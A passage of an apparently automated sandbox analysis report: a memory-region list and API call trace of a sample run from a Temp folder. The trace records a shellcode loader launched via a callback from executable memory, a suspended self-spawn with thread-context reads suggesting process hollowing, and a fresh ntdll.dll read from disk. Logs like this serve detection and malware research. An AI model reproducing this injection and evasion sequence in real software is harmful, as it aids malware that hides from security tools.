(normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 400 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 401 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 402 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 403 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 404 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 405 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 406 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 407 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 408 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 409 start_va = 0x6cd10000 end_va = 0x6cd20fff monitored = 0 entry_point = 0x6cd11bd0 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\SysWOW64\\wsnmp32.dll" (normalized: "c:\\windows\\syswow64\\wsnmp32.dll") Region: id = 410 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 411 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 412 start_va = 0x6ccc0000 end_va = 0x6cd00fff monitored = 0 entry_point = 0x6ccce050 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 413 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 414 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 415 start_va = 0x6cc90000 end_va = 0x6ccb3fff monitored = 0 entry_point = 0x6cc94820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 416 start_va = 0x6c900000 end_va = 0x6cc88fff monitored = 0 entry_point = 0x6c99cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 417 start_va = 0x6c880000 end_va = 0x6c8fbfff monitored = 0 entry_point = 0x6c8a28b0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 418 start_va = 0x70460000 end_va = 0x7048bfff monitored = 0 entry_point = 0x7047bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 419 start_va = 0x70490000 end_va = 0x704affff monitored = 0 entry_point = 0x7049d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 420 start_va = 0x71f80000 end_va = 0x71faefff monitored = 0 entry_point = 0x71f8bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 421 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 422 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 423 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 424 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 425 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 426 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 427 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 428 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 429 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 430 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 431 start_va = 0x6c850000 end_va = 0x6c872fff monitored = 0 entry_point = 0x6c858940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 432 start_va = 0x890000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 433 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 434 start_va = 0x950000 end_va = 0xad7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 435 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 436 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 437 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 438 start_va = 0xae0000 end_va = 0xc60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 439 start_va = 0xc70000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 440 start_va = 0x890000 end_va = 0x920fff monitored = 0 entry_point = 0x8c8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 441 start_va = 0x940000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 442 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 443 start_va = 0x450000 end_va = 0x469fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 460 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 461 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 463 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 464 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 465 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 466 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 467 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 468 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 469 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 470 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 471 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 472 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 473 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 474 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 475 start_va = 0x2070000 end_va = 0x21e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 476 start_va = 0x21f0000 end_va = 0x236afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Thread: id = 5 os_tid = 0x404 [0122.411] __set_app_type (_Type=0x2) [0122.411] __p__fmode () returned 0x74e64d6c [0122.411] __p__commode () returned 0x74e65b1c [0122.412] __wgetmainargs (in: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c, _DoWildCard=0, _StartInfo=0x19ff14 | out: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c) returned 0 [0122.414] GetStartupInfoW (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0122.415] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0122.415] _wfopen (_FileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jplmbcuny"), _Mode="rb") returned 0x74e61268 [0122.415] VirtualAlloc (lpAddress=0x0, dwSize=0x130b, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0122.416] fread (in: _DstBuf=0x1f0000, _ElementSize=0x130b, _Count=0x1, _File=0x74e61268 | out: _DstBuf=0x1f0000*, _File=0x74e61268) returned 0x1 [0122.417] EnumSystemCodePagesW (lpCodePageEnumProc=0x1f0000, dwFlags=0x0) [0122.419] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x77680000 [0122.420] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f7ac | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0122.420] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="jurqlvqzsu80j5x5" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5") returned 1 [0122.420] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jurqlvqzsu80j5x5" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\jurqlvqzsu80j5x5"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0122.420] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19fff [0122.420] VirtualAlloc (lpAddress=0x0, dwSize=0x19fff, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0122.421] ReadFile (in: hFile=0x1e0, lpBuffer=0x450000, nNumberOfBytesToRead=0x19fff, lpNumberOfBytesRead=0x19fbbc, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x19fbbc*=0x19fff, lpOverlapped=0x0) returned 1 [0122.424] CloseHandle (hObject=0x1e0) returned 1 [0122.446] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77830000 [0122.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f2b0, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe")) returned 0x33 [0122.446] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eb2c, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cbgsujmwws.exe")) returned 0x33 [0122.446] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" [0122.447] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f208*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f26c | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", lpProcessInformation=0x19f26c*(hProcess=0x1e4, hThread=0x1e0, dwProcessId=0x93c, dwThreadId=0xb4c)) returned 1 [0122.475] GetThreadContext (in: hThread=0x1e0, lpContext=0x19ef3c | out: lpContext=0x19ef3c*(ContextFlags=0x10007, Dr0=0x7786a1fe, Dr1=0x19ef9c, Dr2=0x19f038, Dr3=0x7a0, Dr6=0x1a1e64, Dr7=0x536cd652, FloatSave.ControlWord=0x10, FloatSave.StatusWord=0x7788a260, FloatSave.TagWord=0x19f001, FloatSave.ErrorOffset=0x19f080, FloatSave.ErrorSelector=0x1a1714, FloatSave.DataOffset=0xa, FloatSave.DataSelector=0x101efd4, FloatSave.RegisterArea=([0]=0x52, [1]=0xd6, [2]=0x6c, [3]=0x53, [4]=0x7c, [5]=0x1, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xec, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x2, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0xa4, [25]=0x5d, [26]=0x6e, [27]=0x9, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x25, [33]=0x2, [34]=0x0, [35]=0xc0, [36]=0x80, [37]=0xf0, [38]=0x19, [39]=0x0, [40]=0x38, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0xf4, [45]=0xef, [46]=0x19, [47]=0x0, [48]=0x0, [49]=0xf0, [50]=0x19, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xf4, [65]=0xf0, [66]=0x19, [67]=0x0, [68]=0xa4, [69]=0x9c, [70]=0x86, [71]=0x77, [72]=0xf4, [73]=0x5d, [74]=0x6e, [75]=0x9, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x552168, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x24e000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf0, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x30, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x86, [23]=0x77, [24]=0xb8, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x80, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x86, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x86, [55]=0x77, [56]=0xb4, [57]=0x42, [58]=0x6e, [59]=0x9, [60]=0xf8, [61]=0xf1, [62]=0x19, [63]=0x0, [64]=0x88, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf0, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x94, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xb8, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0xf8, [85]=0xf1, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x40, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x8a, [111]=0x77, [112]=0x1c, [113]=0x93, [114]=0xe5, [115]=0x7e, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x86, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x87, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf0, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xb4, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x88, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x87, [163]=0x77, [164]=0x6c, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc0, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x6c, [205]=0xf1, [206]=0x19, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xc4, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x80, [291]=0x0, [292]=0xc0, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x1, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0xb0, [306]=0x31, [307]=0x0, [308]=0x0, [309]=0xe0, [310]=0x31, [311]=0x0, [312]=0xd4, [313]=0x57, [314]=0x68, [315]=0xf4, [316]=0xc8, [317]=0x42, [318]=0x6e, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x60, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x60, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x60, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x58, [349]=0x43, [350]=0x6e, [351]=0x9, [352]=0xe4, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x86, [363]=0x77, [364]=0xc, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x80, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x86, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x48, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x86, [435]=0x77, [436]=0xf8, [437]=0xf1, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x98, [445]=0x42, [446]=0x6e, [447]=0x9, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x50, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x87, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x87, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x68, [489]=0x21, [490]=0x55, [491]=0x0, [492]=0x7c, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x48, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0122.484] ReadProcessMemory (in: hProcess=0x1e4, lpBaseAddress=0x24e008, lpBuffer=0x19f280, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19f280*, lpNumberOfBytesRead=0x0) returned 1 [0122.485] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eaf4 | out: Wow64Process=0x19eaf4*=1) returned 1 [0122.485] lstrlenW (lpString="cbgsujmwws.exe") returned 14 [0122.509] lstrlenW (lpString="ntdll.dll") returned 9 [0122.509] lstrlenW (lpString="ntdll.dll") returned 9 [0122.509] lstrlenW (lpString="ntdll.dll") returned 9 [0122.509] lstrlenW (lpString="ntdll.dll") returned 9 [0122.509] lstrlenW (lpString="tdll.dll") returned 8 [0122.509] lstrlenW (lpString="dll.dll") returned 7 [0122.509] lstrlenW (lpString="ll.dll") returned 6 [0122.510] lstrlenW (lpString="l.dll") returned 5 [0122.510] lstrlenW (lpString=".dll") returned 4 [0122.510] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0122.510] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0122.510] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000 [0122.510] 